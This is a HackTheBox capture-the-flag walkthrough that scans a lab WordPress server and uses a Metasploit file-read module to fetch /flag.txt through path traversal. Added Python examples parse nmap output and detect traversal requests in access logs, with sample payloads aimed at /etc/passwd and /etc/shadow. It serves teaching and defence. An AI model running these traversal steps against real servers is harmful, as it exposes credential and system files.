Public Exploits
ℹ️ Information

- 🌐 Website: HackTheBox
- 📚 Module: Getting Started
- 🔗 Link: Public Exploits

❓ Question
Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
📋 Walkthrough
Run an nmap service version scan against the target. We get this result:

```text
PORT      STATE SERVICE VERSION
45441/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Getting Started – Just another WordPress site
|_http-generator: WordPress 5.6.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
```
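As an added example (not part of the original walkthrough), here is a small Python parser that turns nmap service output like the block above into a structured inventory. This is the defensive counterpart of the identification step: an asset owner wants the exposed server banner and the CMS version recorded side by side, because both are what a public-exploit search keys on. The sample input is the page's nmap output plus one constructed ssh line; the function names `parse_nmap` and `web_stacks` are my own.

```python
import re
from typing import Any, Dict, List, Optional

# Constructed sample: the nmap service scan output shown above, plus one
# constructed ssh line so the parser is exercised on more than one port.
SAMPLE_NMAP = """\
PORT      STATE SERVICE VERSION
45441/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Getting Started – Just another WordPress site
|_http-generator: WordPress 5.6.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
"""

# Matches a port line such as "45441/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# Matches a single-line NSE script result such as "|_http-generator: WordPress 5.6.1"
SCRIPT_RE = re.compile(r"^\|_?([\w-]+):\s*(.*)$")


def parse_nmap(text: str) -> List[Dict[str, Any]]:
    """Turn nmap -sV text output into a list of service records.

    Each record holds port, protocol, state, service name, the version
    banner, and a dict of the NSE script results attached to that port.
    """
    services: List[Dict[str, Any]] = []
    current: Optional[Dict[str, Any]] = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
                "scripts": {},
            }
            services.append(current)
            continue
        m = SCRIPT_RE.match(line)
        if m and current is not None:
            # Script lines belong to the most recent port line.
            current["scripts"][m.group(1)] = m.group(2).strip()
    return services


def web_stacks(services: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """For each http(s) service, pair the server banner with the CMS that
    http-generator advertised, so both layers land in the inventory."""
    out: List[Dict[str, Any]] = []
    for s in services:
        if not str(s["service"]).startswith("http"):
            continue
        scripts = s["scripts"]
        out.append({
            "port": s["port"],
            # Prefer the explicit Server header; fall back to the -sV banner.
            "server": scripts.get("http-server-header", s["version"]),
            "cms": scripts.get("http-generator"),
        })
    return out


if __name__ == "__main__":
    for entry in web_stacks(parse_nmap(SAMPLE_NMAP)):
        print(entry)
```

The parser only handles single-line `|_` script results; multi-line NSE output (lines starting with `| `) is ignored, which is enough for the version fields an inventory needs.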
The site also runs the ****** ****** plugin 2.*.* for W********. We can search online for a public exploit for this plugin; it appears to be vulnerable. We will try to exploit it using the Metasploit Framework (as the module intends). Search for that plugin:

```text
msf6 > search ***** plugin w********

   #  Name                                               Disclosure Date  Rank    Check  Description
   -  ----                                               ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/wp_******_******_file_read  .                normal  No     WordPress ****** ****** File Read Vulnerability

msf6 > use 0
msf6 auxiliary(scanner/http/wp_******_******_file_read) > show options

Module options (auxiliary/scanner/http/wp_******_******_file_read):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      6                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /etc/passwd      yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host
```
Set RHOSTS (remote host), RPORT (remote port) and FILEPATH, because the question says the flag is in /flag.txt:

```text
msf6 auxiliary(scanner/http/wp_******_******_file_read) > set rhosts [IP]
rhosts => [IP]
msf6 auxiliary(scanner/http/wp_******_******_file_read) > set rport 45441
rport => 45441
msf6 auxiliary(scanner/http/wp_******_******_file_read) > set filepath /flag.txt
filepath => /flag.txt
```
Run `show options` again to check that everything is set correctly, then run the module:

```text
msf6 auxiliary(scanner/http/wp_******_******_file_read) > show options

Module options (auxiliary/scanner/http/wp_******_******_file_read):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      6                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /flag.txt        yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     [IP]             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      45441            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

msf6 auxiliary(scanner/http/wp_******_******_file_read) > run

[+] File saved in: /home/kali/.msf4/loot/20240824125258_default_94.237.49.212_simplebackup.tra_781127.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

The requested file is written to the loot directory shown in the output; read that file to get the flag.
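The module reads an arbitrary file by walking up the directory tree (the DEPTH option is the number of `../` segments needed to reach the root folder). On the defender's side, that activity lands in the web server's access log. The following Python detector is an added example, not part of the original walkthrough or of Metasploit: it undoes layered percent-encoding, flags requests whose decoded target contains traversal segments, and reports how far each one climbed and which file it asked for. The log lines, the client addresses and the plugin path `example-plugin/export.php?path=` are constructed placeholders; the samples use six `../` segments to mirror the module's default DEPTH of 6.

```python
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import unquote

# Constructed Apache combined-format log lines. The plugin path
# "example-plugin/export.php?path=" is a placeholder, not the plugin from the
# walkthrough; the six "../" segments mirror the module's default DEPTH of 6.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Aug/2024:12:52:58 +0000] "GET /wp-content/plugins/example-plugin/export.php?path=../../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
10.0.0.5 - - [24/Aug/2024:12:52:59 +0000] "GET /wp-content/plugins/example-plugin/export.php?path=..%2F..%2F..%2F..%2F..%2F..%2Fflag.txt HTTP/1.1" 200 32 "-" "Mozilla/5.0"
10.0.0.5 - - [24/Aug/2024:12:53:00 +0000] "GET /wp-content/plugins/example-plugin/export.php?path=%252e%252e%252f%252e%252e%252fetc%252fshadow HTTP/1.1" 403 199 "-" "Mozilla/5.0"
192.168.1.20 - - [24/Aug/2024:12:53:05 +0000] "GET /wp-content/uploads/2024/08/photo.jpg HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
"""

# Apache combined format: client, ident, user, [timestamp], "METHOD target PROTO", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# A parent-directory segment, checked after decoding and backslash normalisation.
TRAVERSAL_RE = re.compile(r"\.\./")


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo layered percent-encoding (%252e -> %2e -> .), stopping when stable."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_hits(log_text: str) -> List[Dict[str, object]]:
    """Return one record per request whose decoded target contains '../'."""
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = fully_decode(m["target"]).replace("\\", "/")
        if not TRAVERSAL_RE.search(target):
            continue
        segments = target.split("../")
        hits.append({
            "ip": m["ip"],
            "time": m["ts"],
            "status": int(m["status"]),
            "depth": len(segments) - 1,             # how many levels it climbed
            "file": segments[-1],                   # what it asked for after climbing
            "served": m["status"].startswith("2"),  # a 2xx means the server answered
        })
    return hits


def by_source(hits: List[Dict[str, object]]) -> Dict[str, int]:
    """Count traversal requests per client address for triage."""
    return dict(Counter(str(h["ip"]) for h in hits))


if __name__ == "__main__":
    found = traversal_hits(SAMPLE_LOG)
    for h in found:
        print(h)
    print(by_source(found))
```

The `served` flag is the triage signal: a traversal request that the server answered with a 2xx status is a probable disclosure and the named file tells you what was exposed, whereas a 403 or 404 indicates a blocked or failed attempt. Decoding is bounded to a few rounds so that a deliberately deep encoding cannot stall the detector.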
Answer
HTB{************}